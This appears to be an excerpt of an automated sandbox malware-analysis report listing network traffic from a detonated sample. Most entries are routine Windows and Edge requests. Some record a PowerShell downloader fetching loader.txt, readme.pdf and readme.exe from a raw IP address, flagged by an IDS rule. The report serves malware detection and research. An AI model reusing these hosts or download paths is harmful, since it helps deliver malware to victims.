mode.$zz#RichPELC`@6Y$.".text
                      Source: Joe Sandbox ViewIP Address: 13.107.246.63 13.107.246.63
                      Source: Joe Sandbox ViewIP Address: 152.195.19.97 152.195.19.97
                      Source: Joe Sandbox ViewASN Name: GOBULNETBG GOBULNETBG
                      Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49732 -> 95.169.201.100:18960
                      Source: global trafficHTTP traffic detected: GET /work/api/v2/tenant/my/settingswithflights?&clienttype=edge-omnibox HTTP/1.1Host: business.bing.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /api/v1/user/token/microsoftgraph?&clienttype=edge-omnibox HTTP/1.1Host: business.bing.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1733921900&P2=404&P3=2&P4=Apf4XrGaxB%2bIL4XfteTK76kLScPQZtPnMob%2bCW3cS9QClvUowtOVlkUWeX8R3QyNE3LZp3QA%2bxRFzYNB72EsiA%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: e3I7uDuebd6WiJmIMkhEEhSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/arbitration_priority_list/4.0.5/asset?assetgroup=ArbitrationService HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ArbitrationServiceSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: POST /chromewebstore/v1.1/items/verify HTTP/1.1Host: www.googleapis.comConnection: keep-aliveContent-Length: 119Content-Type: application/jsonSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
                      Source: global trafficHTTP traffic detected: POST /ppsecure/deviceaddcredential.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 7642Host: login.live.com
                      Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
                      Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4775Host: login.live.com
                      Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4775Host: login.live.com
                      Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4775Host: login.live.com
                      Source: global trafficHTTP traffic detected: GET /api/secure/116887b2ac34a05784dca6f2cac7cc03 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 95.169.201.100:18956Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /uploads/team-1/loader.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 95.169.201.100:18960Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /uploads/team-1/readme.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 95.169.201.100:18960Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /uploads/team-1/readme.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 95.169.201.100:18960
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.169.201.100
                      Source: global trafficHTTP traffic detected: GET /work/api/v2/tenant/my/settingswithflights?&clienttype=edge-omnibox HTTP/1.1Host: business.bing.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /api/v1/user/token/microsoftgraph?&clienttype=edge-omnibox HTTP/1.1Host: business.bing.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=R361f7MVTHdTCvt&MD=TCE+BRaf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                      Source: global trafficHTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1733921900&P2=404&P3=2&P4=Apf4XrGaxB%2bIL4XfteTK76kLScPQZtPnMob%2bCW3cS9QClvUowtOVlkUWeX8R3QyNE3LZp3QA%2bxRFzYNB72EsiA%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: e3I7uDuebd6WiJmIMkhEEhSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/arbitration_priority_list/4.0.5/asset?assetgroup=ArbitrationService HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ArbitrationServiceSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=R361f7MVTHdTCvt&MD=TCE+BRaf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                      Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
